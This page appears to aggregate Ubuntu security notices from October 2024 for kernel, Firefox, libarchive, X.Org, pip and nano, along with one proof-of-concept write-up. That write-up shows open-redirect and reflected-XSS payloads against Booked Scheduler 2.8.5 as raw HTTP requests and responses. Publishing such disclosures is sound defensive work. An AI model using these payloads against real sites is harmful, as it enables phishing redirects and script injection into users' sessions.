Ubuntu Security Notice 7076-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7076-2October 31, 2024linux-azure-fde-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Microsoft Azure Network Adapter (MANA) driver;  - Watchdog drivers;  - Netfilter;  - Network traffic control;(CVE-2024-45016, CVE-2024-38630, CVE-2024-45001, CVE-2024-27397)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.15.0-1074-azure-fde  5.15.0-1074.83~20.04.1.1  linux-image-azure-fde           5.15.0.1074.83~20.04.1.51After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7076-2  https://ubuntu.com/security/notices/USN-7076-1  CVE-2024-27397, CVE-2024-38630, CVE-2024-45001, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1074.83~20.04.1.1

Ubuntu Security Notice USN-7076-2

Ubuntu Security Notice 7021-5 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7021-5October 31, 2024linux-azure-fde vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - BTRFS file system;  - F2FS file system;  - GFS2 file system;  - BPF subsystem;  - Netfilter;  - RxRPC session sockets;  - Integrity Measurement Architecture(IMA) framework;(CVE-2024-27012, CVE-2024-38570, CVE-2024-42228, CVE-2024-41009,CVE-2024-39494, CVE-2024-42160, CVE-2024-39496, CVE-2024-26677)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1073-azure-fde  5.15.0-1073.82.1  linux-image-azure-fde-lts-22.04  5.15.0.1073.82.50After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7021-5  https://ubuntu.com/security/notices/USN-7021-4  https://ubuntu.com/security/notices/USN-7021-3  https://ubuntu.com/security/notices/USN-7021-2  https://ubuntu.com/security/notices/USN-7021-1  CVE-2024-26677, CVE-2024-27012, CVE-2024-38570, CVE-2024-39494,  CVE-2024-39496, CVE-2024-41009, CVE-2024-42160, CVE-2024-42228Package Information:  https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1073.82.1

Ubuntu Security Notice USN-7021-5

Ubuntu Security Notice 7086-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-7086-1October 31, 2024firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2024-10458CVE-2024-10459, CVE-2024-10460, CVE-2024-10461, CVE-2024-10462,CVE-2024-10463, CVE-2024-10464, CVE-2024-10465, CVE-2024-10466,CVE-2024-10467, CVE-2024-10468)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  firefox                         132.0+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-7086-1  CVE-2024-10458, CVE-2024-10459, CVE-2024-10460, CVE-2024-10461,  CVE-2024-10462, CVE-2024-10463, CVE-2024-10464, CVE-2024-10465,  CVE-2024-10466, CVE-2024-10467, CVE-2024-10468Package Information:  https://launchpad.net/ubuntu/+source/firefox/132.0+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-7086-1

Ubuntu Security Notice 7087-1 - It was discovered that libarchive incorrectly handled certain RAR archive files. If a user or automated system were tricked into processing a specially crafted RAR archive, an attacker could use this issue to cause libarchive to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-7087-1  
October 31, 2024

libarchive vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.10  
- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

libarchive could be made to crash or run programs as your login if it  
opened a specially crafted file.

Software Description:  
- libarchive: Library to read/write archive files

Details:

It was discovered that libarchive incorrectly handled certain RAR archive  
files. If a user or automated system were tricked into processing a  
specially crafted RAR archive, an attacker could use this issue to cause  
libarchive to crash, resulting in a denial of service, or possibly execute  
arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.10  
  libarchive13t64                 3.7.4-1ubuntu0.1

Ubuntu 24.04 LTS  
  libarchive13t64                 3.7.2-2ubuntu0.3

Ubuntu 22.04 LTS  
  libarchive13                    3.6.0-1ubuntu1.3

Ubuntu 20.04 LTS  
  libarchive13                    3.4.0-2ubuntu1.4

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7087-1  
  CVE-2024-20696

Package Information:  
  https://launchpad.net/ubuntu/+source/libarchive/3.7.4-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/libarchive/3.7.2-2ubuntu0.3  
  https://launchpad.net/ubuntu/+source/libarchive/3.6.0-1ubuntu1.3  
  https://launchpad.net/ubuntu/+source/libarchive/3.4.0-2ubuntu1.4

Ubuntu Security Notice USN-7087-1

Ubuntu Security Notice 7085-2 - USN-7085-1 fixed a vulnerability in X.Org. This update provides the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled certain memory operations in the X Keyboard Extension. An attacker could use this issue to cause the X Server to crash, leading to a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-7085-2  
October 30, 2024

xorg-server, xorg-server-hwe-16.04, xorg-server-hwe-18.04 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

X.Org X Server could be made to crash or run programs if it received  
specially crafted data.

Software Description:  
- xorg-server: X.Org X11 server  
- xorg-server-hwe-18.04: X.Org X11 server  
- xorg-server-hwe-16.04: X.Org X11 server

Details:

USN-7085-1 fixed a vulnerability in X.Org. This update provides  
the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.

Original advisory details:

 Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled  
 certain memory operations in the X Keyboard Extension. An attacker could  
 use this issue to cause the X Server to crash, leading to a denial of  
 service, or possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS  
  xserver-xorg-core               2:1.19.6-1ubuntu4.15+esm9  
                                  Available with Ubuntu Pro  
  xserver-xorg-core-hwe-18.04     2:1.20.8-2ubuntu2.2~18.04.11+esm1  
                                  Available with Ubuntu Pro  
  xwayland                        2:1.19.6-1ubuntu4.15+esm9  
                                  Available with Ubuntu Pro  
  xwayland-hwe-18.04              2:1.20.8-2ubuntu2.2~18.04.11+esm1  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  xserver-xorg-core               2:1.18.4-0ubuntu0.12+esm14  
                                  Available with Ubuntu Pro  
  xserver-xorg-core-hwe-16.04     2:1.19.6-1ubuntu4.1~16.04.6+esm6  
                                  Available with Ubuntu Pro  
  xwayland                        2:1.18.4-0ubuntu0.12+esm14  
                                  Available with Ubuntu Pro  
  xwayland-hwe-16.04              2:1.19.6-1ubuntu4.1~16.04.6+esm6  
                                  Available with Ubuntu Pro

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7085-2  
  https://ubuntu.com/security/notices/USN-7085-1  
  CVE-2024-9632

Ubuntu Security Notice USN-7085-2

Ubuntu Security Notice 7084-2 - USN-7084-1 fixed vulnerability in urllib3. This update provides the corresponding update for the urllib3 module bundled into pip. It was discovered that urllib3 didn't strip HTTP Proxy-Authorization header on cross-origin redirects. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-7084-2  
October 30, 2024

python-pip vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.10  
- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

urllib3 could leak sensitive information.

Software Description:  
- python-pip: Python package installer

Details:

USN-7084-1 fixed vulnerability in urllib3. This update provides the  
corresponding update for the urllib3 module bundled into pip.

Original advisory details:

 It was discovered that urllib3 didn't strip HTTP Proxy-Authorization  
 header on cross-origin redirects. A remote attacker could possibly use  
 this issue to obtain sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.10  
  python3-pip                     24.2+dfsg-1ubuntu0.1  
  python3-pip-whl                 24.2+dfsg-1ubuntu0.1

Ubuntu 24.04 LTS  
  python3-pip                     24.0+dfsg-1ubuntu1.1  
  python3-pip-whl                 24.0+dfsg-1ubuntu1.1

Ubuntu 22.04 LTS  
  python3-pip                     22.0.2+dfsg-1ubuntu0.5  
  python3-pip-whl                 22.0.2+dfsg-1ubuntu0.5

Ubuntu 20.04 LTS  
  python-pip-whl                  20.0.2-5ubuntu1.11  
  python3-pip                     20.0.2-5ubuntu1.11

Ubuntu 18.04 LTS  
  python-pip                      9.0.1-2.3~ubuntu1.18.04.8+esm6  
                                  Available with Ubuntu Pro  
  python-pip-whl                  9.0.1-2.3~ubuntu1.18.04.8+esm6  
                                  Available with Ubuntu Pro  
  python3-pip                     9.0.1-2.3~ubuntu1.18.04.8+esm6  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  python-pip                      8.1.1-2ubuntu0.6+esm10  
                                  Available with Ubuntu Pro  
  python-pip-whl                  8.1.1-2ubuntu0.6+esm10  
                                  Available with Ubuntu Pro  
  python3-pip                     8.1.1-2ubuntu0.6+esm10  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7084-2  
  https://ubuntu.com/security/notices/USN-7084-1  
  CVE-2024-37891

Package Information:  
https://launchpad.net/ubuntu/+source/python-pip/24.2+dfsg-1ubuntu0.1  
https://launchpad.net/ubuntu/+source/python-pip/24.0+dfsg-1ubuntu1.1  
https://launchpad.net/ubuntu/+source/python-pip/22.0.2+dfsg-1ubuntu0.5  
https://launchpad.net/ubuntu/+source/python-pip/20.0.2-5ubuntu1.11

Ubuntu Security Notice USN-7084-2

Ubuntu Security Notice 7085-1 - Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled certain memory operations in the X Keyboard Extension. An attacker could use this issue to cause the X Server to crash, leading to a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-7085-1  
October 30, 2024

xorg-server, xwayland vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.10  
- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

X.Org X Server could be made to crash or run programs if it received  
specially crafted data.

Software Description:  
- xorg-server: X.Org X11 server  
- xwayland: X server for running X clients under Wayland

Details:

Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled  
certain memory operations in the X Keyboard Extension. An attacker could  
use this issue to cause the X Server to crash, leading to a denial of  
service, or possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.10  
  xserver-xorg-core               2:21.1.13-2ubuntu1.1  
  xwayland                        2:24.1.2-1ubuntu0.1

Ubuntu 24.04 LTS  
  xserver-xorg-core               2:21.1.12-1ubuntu1.1  
  xwayland                        2:23.2.6-1ubuntu0.1

Ubuntu 22.04 LTS  
  xserver-xorg-core               2:21.1.4-2ubuntu1.7~22.04.12  
  xwayland                        2:22.1.1-1ubuntu0.14

Ubuntu 20.04 LTS  
  xserver-xorg-core               2:1.20.13-1ubuntu1~20.04.18  
  xwayland                        2:1.20.13-1ubuntu1~20.04.18

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7085-1  
  CVE-2024-9632

Package Information:  
  https://launchpad.net/ubuntu/+source/xorg-server/2:21.1.13-2ubuntu1.1  
  https://launchpad.net/ubuntu/+source/xwayland/2:24.1.2-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/xorg-server/2:21.1.12-1ubuntu1.1  
  https://launchpad.net/ubuntu/+source/xwayland/2:23.2.6-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/xorg-server/2:21.1.4-2ubuntu1.7~22.04.12  
  https://launchpad.net/ubuntu/+source/xwayland/2:22.1.1-1ubuntu0.14  
  https://launchpad.net/ubuntu/+source/xorg-server/2:1.20.13-1ubuntu1~20.04.18

Ubuntu Security Notice USN-7085-1

Ubuntu Security Notice 7084-1 - It was discovered that urllib3 didn't strip HTTP Proxy-Authorization header on cross-origin redirects. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-7084-1  
October 29, 2024

python-urllib3 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.10  
- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

urllib3 could leak sensitive information.

Software Description:  
- python-urllib3: HTTP library with thread-safe connection pooling

Details:

It was discovered that urllib3 didn't strip HTTP Proxy-Authorization header  
on cross-origin redirects. A remote attacker could possibly use this issue  
to obtain sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.10  
  python3-urllib3                 2.0.7-2ubuntu0.1

Ubuntu 24.04 LTS  
  python3-urllib3                 2.0.7-1ubuntu0.1

Ubuntu 22.04 LTS  
  python3-urllib3                 1.26.5-1~exp1ubuntu0.2

Ubuntu 20.04 LTS  
  python3-urllib3                 1.25.8-2ubuntu0.4

Ubuntu 18.04 LTS  
  python-urllib3                  1.22-1ubuntu0.18.04.2+esm2  
                                  Available with Ubuntu Pro  
  python3-urllib3                 1.22-1ubuntu0.18.04.2+esm2  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  python-urllib3                  1.13.1-2ubuntu0.16.04.4+esm2  
                                  Available with Ubuntu Pro  
  python3-urllib3                 1.13.1-2ubuntu0.16.04.4+esm2  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7084-1  
  CVE-2024-37891

Package Information:  
https://launchpad.net/ubuntu/+source/python-urllib3/2.0.7-2ubuntu0.1  
https://launchpad.net/ubuntu/+source/python-urllib3/2.0.7-1ubuntu0.1  
https://launchpad.net/ubuntu/+source/python-urllib3/1.26.5-1~exp1ubuntu0.2  
https://launchpad.net/ubuntu/+source/python-urllib3/1.25.8-2ubuntu0.4

Ubuntu Security Notice USN-7084-1

Booked Scheduler version 2.8.5 suffers from cross site scripting and open redirection vulnerabilities.

    # Exploit Title: Open Redirect / Reflected XSS - booked-schedulerv2.8.5# Date: 10/2024# Exploit Author: Andrey Stoykov# Version: 2.8.5# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-13-reflected.htmlhttps://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-12-open.htmlOpen Redirect:Steps to Reproduce:1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP2. In the "resume" parameter add the redirect URL e.g. Burp Collab3. Forward the requestindex.php// HTTP POST login requestPOST /Bookedbo8effotfu/Web/index.php HTTP/1.1Host: localhostCookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0[...]email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg// HTTP responseHTTP/1.1 302 FoundDate: Sat, 12 Oct 2024 12:09:33 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.comContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8Reflected XSS:reservation.php// HTTP GET requestGET/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>HTTP/1.1Host: localhostCookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;new_version=v%3D2.8.5%2Cfs%3D1728734988;fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brDnt: 1Sec-Gpc: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-alive// HTTP responseHTTP/1.1 200 OKDate: Sat, 12 Oct 2024 12:23:55 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 14003<h5><ahref="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Returnto the last page that you were on</a></h5></div>schedule.php// HTTP GET requestGET/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>HTTP/1.1Host: localhostCookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb;resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D;schedule_calendar_toggle=falseUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-alive// HTTP responseHTTP/1.1 200 OKDate: Sat, 19 Oct 2024 09:12:33 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 7853<h5><ahref="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Returnto the last page that you were on

Booked Scheduler 2.8.5 Cross Site Scripting / Open Redirection

Ubuntu Security Notice 7064-2 - USN-7064-1 fixed a vulnerability in nano. This update provides the corresponding update for Ubuntu 14.04 LTS. It was discovered that nano allowed a possible privilege escalation through an insecure temporary file. If nano was killed while editing, the permissions granted to the emergency save file could be used by an attacker to escalate privileges using a malicious symlink.

    ==========================================================================Ubuntu Security Notice USN-7064-2October 29, 2024nano vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTSSummary:nano could be made to give users administrator privileges.Software Description:- nano: small, friendly text editor inspired by PicoDetails:USN-7064-1 fixed a vulnerability in nano. This update provides thecorresponding update for Ubuntu 14.04 LTS.Original advisory details:It was discovered that nano allowed a possible privilege escalationthrough an insecure temporary file. If nano was killed while editing, thepermissions granted to the emergency save file could be used by anattacker to escalate privileges using a malicious symlink.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTSnano 2.2.6-1ubuntu1+esm1Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-7064-2https://ubuntu.com/security/notices/USN-7064-1CVE-2024-5742

Tag

#ubuntu